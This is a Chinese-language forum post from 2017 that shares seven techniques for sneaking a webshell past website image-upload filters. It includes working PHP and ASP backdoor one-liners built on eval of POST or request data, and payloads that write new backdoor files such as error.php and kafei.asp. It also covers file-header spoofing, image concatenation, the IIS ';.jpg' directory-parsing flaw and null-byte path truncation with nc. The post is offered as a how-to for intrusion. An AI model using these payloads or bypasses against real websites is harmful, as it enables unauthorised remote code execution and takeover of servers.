一个属于你的次元网络基地
 
昨日:篇  今日:篇   总帖:篇   会员:
小狼人Lv92   
分享上传图片shell的绕过过滤的几种方法     技术教程

一般网站图片上传功能都对文件进行过滤,防止webshell写入。

但不同的程序对过滤也不一样,如何突破过滤继续上传?

本文总结了七种方法,可以突破!


1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php


2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php


3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php


4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。


5、在4基础上改进代码<?php fputs(fopen(“error.php”.”w”).”<?eval(\$_POST[cmd]);?>”)?> 。(php)//同

目录下生成error.php,提问:asp的怎么改写?

回答:asp测试的结果是:没有权限…

<%

Set MyFileObject=Server.CreateObject(“Scripting.FileSystemObject”)

Set MyTextFile=MyFileObject.CreateTextFile(“kafei.asp”)

MyTextFile.WriteLine(“\<\%eval request(chr(35))\%\>”)

MyTextFile.Close

%>

6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。

7、nc抓包改数据 //路径名和文件名没有过滤。

//通过抓包修改上传路径通过/upload/1.asp+空格,使用软件把空格填充为00。然后nc提交获取webshell。

 6  已被阅读了3146次  楼主 2017-09-19 22:48:38
回复列表

回复:分享上传图片shell的绕过过滤的几种方法

加入官群 QQ咨询 友链展示 申请友链
粤ICP备18094291号
您的IP:18.218.172.249,2024-05-02 18:29:49,Processed in 0.08654 second(s).
免责声明: 本网不承担任何由内容提供商提供的信息所引起的争议和法律责任。
Powered by HadSky 8.0.0
已有0次打赏
(6) 分享
分享

请保存二维码或复制链接进行分享

取消